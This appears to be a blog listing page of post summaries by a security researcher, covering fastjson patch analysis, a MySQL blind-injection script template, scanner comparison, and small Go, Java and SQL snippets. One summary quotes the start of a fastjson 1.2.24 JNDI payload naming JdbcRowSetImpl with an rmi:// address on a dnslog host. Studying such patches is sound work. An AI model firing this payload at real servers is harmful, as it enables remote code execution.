摘要: 0X01 fastjson 1.2.47 到 1.2.48做了什么改变 一步步跟进,找到不同的地方 fastjson/serializer/MiscCodec.class中 1.2.47 1.2.48 多了个参数 cache=false fastjson/util/TypeUtils.class c 阅读全文
posted @ 2021-12-09 12:52 huim 阅读(28) 评论(0) 推荐(0) 编辑
摘要: 0X01 fastjson 1.2.25修了什么 用1.2.24的payload打一遍,autotype被拦截 "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://3333.y7jjlyzz.dnslog. 阅读全文
posted @ 2021-12-06 15:46 huim 阅读(51) 评论(0) 推荐(0) 编辑
摘要: 一 环境 mac M1 java version "1.7.0_21" jdk下载地址 https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html 二 pom <?xml version="1.0" e 阅读全文
posted @ 2021-11-08 19:46 huim 阅读(81) 评论(0) 推荐(0) 编辑
摘要: 项目进度 [okr] okr,从国庆前一周,到十月二十几号,定完。 评审期间,各种需求、方案、可行性分析的敲定,也基本按照预料中的排期走。 理论上OKR没定完,就没有要做的事也没有排期。 但OKR制定和评审的流程也挺长,真等到OKR都评审完了,可能一个月就过去了。 所以把各种需求和方案也算到产品的排 阅读全文
posted @ 2021-11-01 17:40 huim 阅读(10) 评论(0) 推荐(0) 编辑
摘要: 扫描器竞品分析 持续一个季度的扫描器竞品分析 写了万字长文后,把报告的框架抽出来一下 ​(写大型文档先用思维导图把框架和大纲整理出来吧) 0X01 竞品分析描述 竞品分析的维度、对象 本次分析从产品概况、产品功能、产品检测能力三个维度对XX等N款漏洞扫描系统(服务)进行分析各自的优缺点 0X02 竞 阅读全文
posted @ 2021-10-11 19:52 huim 阅读(77) 评论(0) 推荐(0) 编辑
摘要: 几次mysql盲注中抽出来的盲注模板 import requests import time time_conf = 1 results = "" for i in range(1, 40): min_char_index = 1 # 当前字符最小ASCII large_char_index = 2 阅读全文
posted @ 2021-09-17 10:28 huim 阅读(13) 评论(0) 推荐(0) 编辑
摘要: 想计算flink udf发起请求的qps,写了个简单的gin package main import ( "bufio" "fmt" "github.com/gin-gonic/gin" "net/http" "os" "strconv" "time" ) var QpsCount = 0 var 阅读全文
posted @ 2021-08-19 12:15 huim 阅读(93) 评论(0) 推荐(0) 编辑
摘要: 正则匹配 // 正则匹配 String line = "example.com/dynamic/infocheck"; String pattern = "/dynamic/infocheck"; Pattern r = Pattern.compile(pattern); // 方法一 Matche 阅读全文
posted @ 2021-08-19 11:11 huim 阅读(13) 评论(0) 推荐(0) 编辑
摘要: export GO111MODULE=off export CGO_ENABLED=0 export GOOS=linux export GOARCH=amd64 go build main.go 阅读全文
posted @ 2021-06-22 20:31 huim 阅读(131) 评论(0) 推荐(0) 编辑
摘要: FROM_UNIXTIME(TIME / 1000000, 'yyyy-MM-dd''T''HH:mm:ss'), 阅读全文
posted @ 2021-06-22 20:27 huim 阅读(985) 评论(0) 推荐(0) 编辑